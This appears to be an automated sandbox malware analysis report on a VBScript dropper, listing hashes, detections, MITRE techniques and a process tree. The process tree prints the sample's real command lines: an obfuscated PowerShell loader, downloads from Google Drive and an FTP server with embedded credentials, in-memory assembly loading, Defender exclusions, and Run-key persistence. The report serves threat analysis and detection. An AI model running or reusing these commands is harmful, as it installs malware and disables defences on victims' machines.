Analysis
max time kernel: 134s
max time network: 138s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-11-2024 23:42
Static task: static1
Behavioral task: behavioral1
  Sample: demeOnay.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: demeOnay.vbs
  Resource: win10v2004-20241007-en
General
Target: demeOnay.vbs
Size: 586KB
MD5: dbc2b2c1ad1e78348f9336869fbf0740
SHA1: 7903a4142cb3c3e588710691a8577e5b7ee3c6c6
SHA256: c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f
SHA512: b4751bcaa288a9f0c74e7fac9bd7e9dc74422c71694300debdefebdc42bc077016bb07b2d928be4eb4d9cb16b18e744be35c82d2e2a53a7a0c290692772b94b2
SSDEEP: 1536:coooooooooooooooooC99999999999999999999999999999999999999999999/:v3Jg6azbLal3Jg6azbLal3Jg6azbLaO
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures

Blocklisted process makes network request (8 IoCs)
flow  pid   Process
14    4028  powershell.exe
25    4028  powershell.exe
27    2580  powershell.exe
33    4028  powershell.exe
34    4028  powershell.exe
36    4028  powershell.exe
38    4028  powershell.exe
40    4780  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid   Process
1276  powershell.exe
3408  powershell.exe
4324  powershell.exe
4780  powershell.exe
524   powershell.exe
3604  powershell.exe
4028  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                 Process
Key value queried  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation  WScript.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ecb = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\cjksu.ps1' \";exit"
Process: powershell.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_ziy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\cjksu.ps1' \";exit"
Process: powershell.exe

Indicator Removal: File Deletion (1 TTPs)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow  ioc
39    pastebin.com
40    pastebin.com

Obfuscated Files or Information: Command Obfuscation (1 TTPs)
Adversaries may obfuscate content during command execution to impede detection.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid   Process
1692  PING.EXE

Runs ping.exe (1 TTPs, 1 IoCs)
pid   Process
1692  PING.EXE

Suspicious behavior: EnumeratesProcesses (23 IoCs)
pid   Process
3604  powershell.exe
3604  powershell.exe
4028  powershell.exe
4028  powershell.exe
2580  powershell.exe
2580  powershell.exe
2580  powershell.exe
3408  powershell.exe
1276  powershell.exe
3408  powershell.exe
1276  powershell.exe
3408  powershell.exe
1276  powershell.exe
524   powershell.exe
524   powershell.exe
524   powershell.exe
4324  powershell.exe
4324  powershell.exe
4324  powershell.exe
4780  powershell.exe
4780  powershell.exe
4780  powershell.exe
4780  powershell.exe

Suspicious use of AdjustPrivilegeToken (8 IoCs)
description              pid   Process
Token: SeDebugPrivilege  3604  powershell.exe
Token: SeDebugPrivilege  4028  powershell.exe
Token: SeDebugPrivilege  2580  powershell.exe
Token: SeDebugPrivilege  3408  powershell.exe
Token: SeDebugPrivilege  1276  powershell.exe
Token: SeDebugPrivilege  524   powershell.exe
Token: SeDebugPrivilege  4324  powershell.exe
Token: SeDebugPrivilege  4780  powershell.exe

Suspicious use of WriteProcessMemory (24 IoCs)
description                       pid   Process         procid_target
PID 4100 wrote to memory of 3604  4100  WScript.exe     85
PID 4100 wrote to memory of 3604  4100  WScript.exe     85
PID 3604 wrote to memory of 4028  3604  powershell.exe  88
PID 3604 wrote to memory of 4028  3604  powershell.exe  88
PID 4028 wrote to memory of 3196  4028  powershell.exe  95
PID 4028 wrote to memory of 3196  4028  powershell.exe  95
PID 4028 wrote to memory of 1692  4028  powershell.exe  96
PID 4028 wrote to memory of 1692  4028  powershell.exe  96
PID 4028 wrote to memory of 2580  4028  powershell.exe  99
PID 4028 wrote to memory of 2580  4028  powershell.exe  99
PID 4028 wrote to memory of 3408  4028  powershell.exe  105
PID 4028 wrote to memory of 3408  4028  powershell.exe  105
PID 4028 wrote to memory of 1276  4028  powershell.exe  106
PID 4028 wrote to memory of 1276  4028  powershell.exe  106
PID 4028 wrote to memory of 3048  4028  powershell.exe  107
PID 4028 wrote to memory of 3048  4028  powershell.exe  107
PID 4028 wrote to memory of 524   4028  powershell.exe  109
PID 4028 wrote to memory of 524   4028  powershell.exe  109
PID 4028 wrote to memory of 4324  4028  powershell.exe  110
PID 4028 wrote to memory of 4324  4028  powershell.exe  110
PID 4028 wrote to memory of 4780  4028  powershell.exe  111
PID 4028 wrote to memory of 4780  4028  powershell.exe  111
PID 4028 wrote to memory of 1176  4028  powershell.exe  112
PID 4028 wrote to memory of 1176  4028  powershell.exe  112
Processes (the bracketed number is the depth of the process in the tree)

[level 1] C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4100
  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = '<long obfuscated base64 string, omitted>';$nqqkv = $qKKzc; ;$nqqkv = $qKKzc.replace('уЦϚ' , 'B') ;;$zmmdr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nqqkv ) ); $zmmdr = $zmmdr[-1..-$zmmdr.Length] -join '';$zmmdr = $zmmdr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs');powershell $zmmdr
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3604
    [level 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ggsww = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ggsww = ($ggsww + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ggsww = ($ggsww + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$ydvxs = (New-Object Net.WebClient);$ydvxs.Encoding = [System.Text.Encoding]::UTF8;$ydvxs.DownloadFile($ggsww, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$npdfh = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $npdfh -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$yfkpt = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $yfkpt -OutFile $obTxq -UseBasicParsing } ;$msrbf = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $msrbf.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/moc.nosrednehmijtcele//:sptth' , $XhRTo , 'D DD' ) );};"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4028
      [level 4] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c
        PID: 3196
      [level 4] C:\Windows\system32\PING.EXE
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe
        PID: 1692
      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABvAGIAVAB4AHEAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAHkAZgBrAHAAdAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABvAGIAVAB4AHEAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJAB5AGYAawBwAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AYgBUAHgAcQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAA= -inputFormat xml -outputFormat text
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2580
      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3408
      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1276
      [level 4] C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
        PID: 3048
      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\\x11.ps1"
        - Command and Scripting Interpreter: PowerShell
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 524
      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\\x22.ps1"
        - Command and Scripting Interpreter: PowerShell
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4324
      [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cjksu.ps1"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4780
      [level 4] C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"
        PID: 1176
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
  Indicator Removal (1)
    File Deletion (1)
  Modify Registry (1)
  Obfuscated Files or Information (1)
    Command Obfuscation (1)
Downloads

C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cjksu.ps1
  Filesize: 1.2MB
  MD5: 4cae4f09bfc221b0067fa2c7bfee0767
  SHA1: ef5e5c14df21ccd2f07dbc7bae34d8a460cc7de3
  SHA256: 0e7e5c20ff5889875323abe6d7f0a8682b345ec94f29033320eddf3f491308bb
  SHA512: faf0b9681306af119fb8c39e32fe4d3b693e80fe0d9120d9afd9e64f862e9e957bee9eee6feaf83cc57ab31bb7714fba61ffab8c65e5967d65fd220d4f81343a

C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\x11.ps1
  Filesize: 402B
  MD5: 074bb1fafb328d28f18ae547a0973660
  SHA1: 76fba421cbdeea6bb7cfdae3b8f329049525d079
  SHA256: 01096c6bfe9c53d508208737df31fc1c720385cc1264bbc994a52b7112710fe5
  SHA512: d1093531e65b922cd209edf0dbd50259ab599cd2c9fa5fac367f21d9a5ccd604ad505cfd6a2f08891d0387ad553d56581c24101c10bf7e6244ff2f072ee68187

C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\x22.ps1
  Filesize: 406B
  MD5: dfe11e6e84b1878dffad9c8e54a034b5
  SHA1: 3607403e2fdb576100da635d6f6360cd9612b6b0
  SHA256: 77151e8b6a0f623ee04518fd981db7e445b5e7fe619d7d82dffa879d7b79cd8b
  SHA512: 66a5e46cbf03cc433263b6c58497e073553da7a8cfd5345ede10a67b052b5122b0a9db0bb79d2f1b90822171f28a56f3210763fbfb95f4292e484e553fc5e109
(unnamed file)
  Filesize: 3KB
  MD5: 223bd4ae02766ddc32e6145fd1a29301
  SHA1: 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
  SHA256: 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
  SHA512: 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

(unnamed file)
  Filesize: 1KB
  MD5: b138471334bb50e38b7fb5cb817e31b7
  SHA1: bcdaeadb974f3caf0861c6b9a72f90951d51abf2
  SHA256: 4822a32741638f6766340d9f422f4cd1462f11db711e3afedae836a31e4d0d5d
  SHA512: 87c00a67e63aacebb55966ac4a7f9c54f90b808393ea01192df3b5e30b1f50e15d2f5e0714e60cb7cad1d9a412beae24ceb19efa10941a1d9dfc2d210d1aec03

(unnamed file)
  Filesize: 944B
  MD5: 07ac9f95d8b16a198963d5b669eca2f8
  SHA1: a45b28c4aced1de0eacaa54a38208bbe82f05d34
  SHA256: 9ba8a7edec1a92e26aa48ee62e00e49cfc4847cfcbe304a4099dc0dd0f3e5b05
  SHA512: 290b472719f9a1d2121c1a100ab811c15ca43bddb0d274c3da802e28baa13a513d8e3b8bf24a56a54aa057fc892de465c6e06a3020384aec51e09726012a1231

(unnamed file)
  Filesize: 64B
  MD5: abc61a3ba469eac4fc74fc0440ae970d
  SHA1: c87f49a9b96149161ee8ac965c4c817cc9593a0e
  SHA256: 1abd78d7c97794e384de9b89f590fadbf6304357a553331a3d333bca222ef068
  SHA512: 21ac44a68125bee45f9843370c941779a06c1201ddf55b88a39189f92c16e89de2a9c3cd022d2bccfc4a9a5e0745582df8eab5cb9aa3cde2d4c2e014f2589d9a

(unnamed file)
  Filesize: 1KB
  MD5: 8c8df45971b4c2a095c8d6ce9c8b0d85
  SHA1: 1922bce27f75c178dc8077a8f71702a3ba52ba0c
  SHA256: 10eb70af88e2872f17691786e51fdc748c7226032a0527a60ab6bf5d7a7aa82d
  SHA512: 5df91b5481de9c659fbfccdf338e34dfa7fa500e8501e9b49d7eca983bbe4802d2658bbb6e460ea4b0327fa3f289aa9e030ac7bd2fc7a299a62745e48c75149a

(unnamed file)
  Filesize: 948B
  MD5: 721991167161c45d61b03e4dbad4984b
  SHA1: fd3fa85d142b5e8d4906d3e5bfe10c5347958457
  SHA256: 0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
  SHA512: f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

(unnamed file)
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

(unnamed file)
  Filesize: 26B
  MD5: d9a6eba20e1a05a18ca853659797ee53
  SHA1: 7577e5fcd39c3b13406e5af6447ba044a21565d3
  SHA256: 1596f1f33f95bf2ef8cc5033ee3ec619e07d2872d200eaede983671cc186a952
  SHA512: 9074b17efb3d6a4d63d7dd8994e4fe771d3019198876acab8e38c310213e2929e15413ab1dd2d1df6d2a73201424aae5aa0c812c5a4a8fe11ef176fdca039a6d

(unnamed file)
  Filesize: 48KB
  MD5: 57e97e524dac6c5c3fb52d758ba7239a
  SHA1: 293f28458ad9a1d10d905fdc335a6c9f5d766c7f
  SHA256: 1f9c28385540f6470a57ae18bc4654f8f54e3436f0ed4e5723634b5841df21de
  SHA512: 1c6b77613742b7041a3b5f3c8b83a2c9cbd81525d8d5cdcedd5550e76f6c16f9fddcb52675974f0e6582baed5d65f79593a7cc8d959838bd3aee4c8dd86f133b